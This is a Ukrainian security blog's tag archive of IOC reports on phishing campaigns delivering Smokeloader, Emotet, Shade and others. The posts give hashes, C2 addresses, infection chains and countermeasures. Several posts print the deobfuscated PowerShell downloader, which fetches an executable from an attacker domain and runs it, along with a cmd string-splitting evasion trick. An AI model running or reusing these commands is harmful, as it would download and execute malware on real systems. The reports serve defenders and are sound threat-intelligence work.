Tag Archive | Smokeloader

IOC_digest_01_2019

Продовжуючи формат переднього дайджесту, ось вам перелік зразків, результати аналізу яких я можу оприлюднити:

07/01/19

розсилали #nanocore, .xlsx > 11882 > GET > AppData\Roaming\*.exe, звіт

09/01/19

розсилали #agenttesla, .xlsx > 11882 > GET > AppData\Roaming\*.exe, звіт

10/01/19

розсилали #smokeloader, (lzh) > js > WSH > Powershell > GET > AppData\Local\TempZna40.exe, звіт

розсилали #LokiBot, .doc(RTF) > 11882 > GET .jpg > %temp%\1.exe , звіт

10/01/19

розсилали #smokeloader, (lzh) > js > WSH > GET > AppData\Roaming\Microsoft\Windows\Templates\*.exe, звіт

14/01/19

розсилали #shade, .ZIP > 2nd .ZIP > JS > WSH > GET > %temp%\*.tmp , звіт

15/01/19

розсилали #shade, .ZIP > 2nd .ZIP > JS > WSH > GET *.jpg > %temp%\*.tmp , звіт

23/01/19

розсилали #emotet, .doc (XML) > macro > cmd > powershell > GET > %temp%\***.exe, звіт

28/01/19

розсилали #emotet, .doc (XML) > macro > cmd > powershell > GET > %temp%\***.exe, звіт

– – – – – – – – – – – – – – – – – – – – – – – –

Аналітика

Методи доставки

Для обходу фільтрів застосовували наступні трюки

Якщо розбити по категоріям, тоді отримаємо

Тенденції

Масова кампанія з розсилки #shade яка розпочалася ще в кінці 2018 року продовжувала застосовувати подвійні архіви із скриптами (WSH).

Поки що, документи із вразливістю редактору формул разом із макросами залишаються основним інструментом компрометації  робочих станцій.

Загалом, вищеописані зразки могли створити інциденти тим організаціям які:

  • не контролюють макроси
  • не контролюють WSH
  • не королюють запуск powershell
  • не посилили фільтрацію приєднань

Узагальнені контрзаходи

Будьте уважні та обережні.

VR

Advertisements

IOC_smokeloader_081118

08/11/18 проходила розсилка #smokeloader

Схема:
email attach (lzh) > js > WSH > GET > %AppData%\MS\Windows\Templates\*.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
79.133.98.58 districoperav{.} icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0

# # #

Більше маркерів (чорновик звіту) за посиланням:

https://pastebin.com/JmthzrL4

Контрзаходи:

• Блокуйте WSH або трафік cscript/wscript
• Фільтруйте нестандартні архіви та скриптові файли
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

IOC_smokeloader_111018

11/10/18 вночі проходила розсилка #smokeloader

Теми листів:
“рахунки ТОВ Заря. оплатить до конца недели”
“Рахунки Богданова за 10е”

Схема:
email attach(lzh) > js > wsh > get 2URL > %templates%\random.exe

Мережеві маркери:
– – – – – – – – – – – – – – – – – –
93.179.68.94 sfbotvinnik{.} icu GET /folua/dwrite.exe HTTP/1.1 Mozilla/4.0

# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/MP3kCSSh

Контрзаходи:

• Блокуйте WSH або трафік cscript/wscript
• Фільтруйте нестандартні архіви та скриптові файли
• Забороняйте/контролюйте створення .exe у C:\Users\
• Блокуйте на Proxy нетипові User Agent.

Будьте уважні та обережні.

VR

IOC_smokeldr_060218

Доброго дня, панове.

Вчора було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Розсилка на 90% наслідує те, що ми вже бачили 30го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу як етектується dropper:

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\63753.exe (минулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   сканирование гарантійний лист 05_02_2018.rar
SHA-256        6fde3aba8453cef14486e1446debaa7b19f321d9f1e7965bc8516478e5de905f
File size      77.89 KB

скрипт приманка:

File name   гарантійний лист 05_02_18р.xls.js
SHA-256        1d183616452133674366777206b102d234adf351829f4e5bb89079dd235d7930
File size      18.57 KB

основна частина:

File name   crsse.exe >> 63753.exe
SHA-256        f02281510c40d71893e000b4d1e11327e2eb76e999df23ba6876e7162eae5144
File size      281.5 KB

Мережеві IOC:

завантаження payload – досі активна!

104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Порівняння деобфускованих команд із розсилки за 30те число:

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист 05_02_18р.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\63753.exe"

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_300118

Доброго дня, панове.

31 січня о другій половині дня були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядалися раніше тут, тут і тут).

Може використовуватися для збору інформації та/або для доставки ransomware чи засобів майнінгу криптовалют.

Приклад фішингу із приєднанням:

Трохи аналітики:

  • Зверніть увагу на претекст середньої якості (без підпису і з нормальними заголовками)
  • Рівень загрози – середній, для організацій, що прислухалися до наших попередніх рекомендацій – низький.
  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня а також 11 листопада
  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Сервер, що розповсюджує основну частину = сервер контролю
  • Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Зважаючи на “почерк” цієї команди, ми припускаємо, що могли бути й інші спроби доставки цього коду не лише з сервісів РФ, але й із скомпрометованих скриньок/серверів вітчизняних установ

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\5541.exe

Маркери IOC:

скрипт приманка:

File name гарантійний лист.js
SHA-256 aabd7951f147d05a2f92caf35f1fe45e43eb6a05deaab451e0086c74e4289e2f
File size 18.8 KB

адреса на яку вказує скрипт:

$env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe

основна частина:

File name crsse.exe >> %temp%\5541.exe
SHA-256 45b3091d63c462eda461bae08e3d781665ce10e3dacd6ef7169f630a11109a3e
File size 340 KB

Отже, запуск скрипта ініціює завантаження основної частини засобами Powershell

(!) зверніть увагу – на відміну від попередньої розсилки, передачу команд зробили з конкатенацією (розбили на шматки)

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\5541.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\5541.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у (співпадає з попередньою розсилкою)

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
Chromium 
c:\users\operator\appdata\roaming\microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

(!) зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows (штатний режим) а з C:\Windows\SYSWOW64\

Мережеві IOC:

завантаження payload – станом на 10ту ранку 1го лютого досі активна!

45.32.179.137:80 HTTP enterwords[.]ru GET /uadoc/crsse.exe

трафік скомпрометованої системи – сервер контролю

45.32.179.137:80 HTTP abank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe та Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_121117_ДСНС_gov.ua

Доброго дня, панове.
Візьміть до уваги – в розсилці приймала участь скринька з домену gov.ua (заголовки не підроблені)!

12 листопада, близько 23ї години були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (попередні зразки тут, тут і тут).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Фактично через нього зловмисники збирають інформацію із скомпрометованих систем і можуть в подальшому довантажити модуль шифрування/затирання файлів.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) – зверніть увагу на приклади трьох правил Access Protection які наведені в кінці допису

Трохи аналітики:

  • Рівень загрози – високий!, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.
  • Незважаючи на вельми примітивну техніку активації приманки (JS скрипти) я ставлю цій розсилці високий рівень загрози через той факт, що одним із джерел була скомпрометована скринька Управління ДСНС Чернігівської області (sribne@cndsns[.]gov[.]ua)

  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня
  • Доставка – через обфусковані JS скрипти із подвійним розширенням у оболонці lzh. (застосували інший формат для обходу фільтрів пошти)
  • Скрипт який було надано а аналіз містить одну прямо задану адресу, а основна частина записується із прямо заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Сервер з якого завантажується payload та сервер контролю – один і той же
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Знову застосовується тактика використання скомпрометованих ресурсів/серверів держ. організацій – gov.ua як правило в “білому” списку
  • Слід очікувати повторних акцій із використанням міксу різних типів доставки та скомпрометованих джерел із зони gov.ua та ua
  • Не достатній рівень уваги до вразливостей застарілих версій систем, яким скористалися зловмисники, призвела до компрометації цього серверу, завтра чи навіть через годину хтось може стати наступним – не будьте жертвою, перевірте наявні вразливості, оновіть софт, змініть паролі

Схема атаки:

email > Attach (lzh) > JS > WSCript > PowerShell > single hardcoded URL > GET > %temp%\65536.exe 
ім'я запускного файлу(співпадає з попередньою розсилкою)

Маркери IOC:

архів:

File name Рахунки Продмаркет.lzh
SHA-256 a47e11e6dc8025575ac3f1742fcf84270d9cd2ab1757d59dee873b1a35f76528
File size 65.34 KB

скрипт приманка:

File name Рахунок по оплаты.xls.js
SHA-256 d0635dfd5e212e16c580d70a18d195a5cc842355a22348f925515a5520725231
File size 21.38 KB

основна частина:

File name micro.exe >> %temp%\65536.exe
SHA-256 63da5f0e5ed298cbf39422298c80f460fa75f46c7d78ce0dd806f30e70c027b5
File size 240 KB

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рахунок до оплаты.xls.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;
$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';
$http_request.open('GET', 'h11p:\\autoxls[.]ru/documentooborot/micro.exe', $false);
$http_request.send();if($http_request.Status -eq "200"){$adodb.open();
$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;
$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe (співпадає з попередньою розсилкою)

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
IM Providers
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

Зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows\ (штатний режим) а з C:\Windows\SysWOW64\

Мережеві IOC:

завантаження payload – досі активна

54.86.9.242:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

54.86.9.242:80 HTTP 117 bbank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

а тепер саме головне

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів, але за умови що він розуміє формат lzh (Email Gateway)
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)
Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику POwershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_171017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядав раніше – тут, тут і тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітким іменем файлу.

Цікаво, що завантаження відбувається не через WSH а засобами Powershell.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектується по GTI.

Схема атаки:

email > Attach (7z) > JS > single hardcoded URL > GET > %temp%\65536.exe

Маркери IOC:

архів:

File name документи.7z
SHA-256 397ad07ab15f802559ac1829ac9c8434bc7c0b6fb55264b088659b638a28ad0d

скрипт приманка:

File name Договор_1743.js
SHA-256 56d9c0da7f825cb474633057e12a1cf197af2352bd0d876591483e2d40472fda

основна частина:

File name pax.exe      >> %temp%\65536.exe
SHA-256 99671ce5287926ac6496a37abd42c87cc1a045696244cc833c3dbc041270cc25

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Договор_1743.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://docfileserver.ru/bank/pax.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run 
Classes
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає новий екземпляр explorer.exe і оперує від його імені.

Трафік скомпрометованої системи:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Відволікаючи маневр – з’єднання із сайтами java, MS etc

[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT 
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED
[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

49.51.38.37 80 HTTP 368 docfileserver.ru GET /bank/pax.exe HTTP/1.1

трафік системи після зараження:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR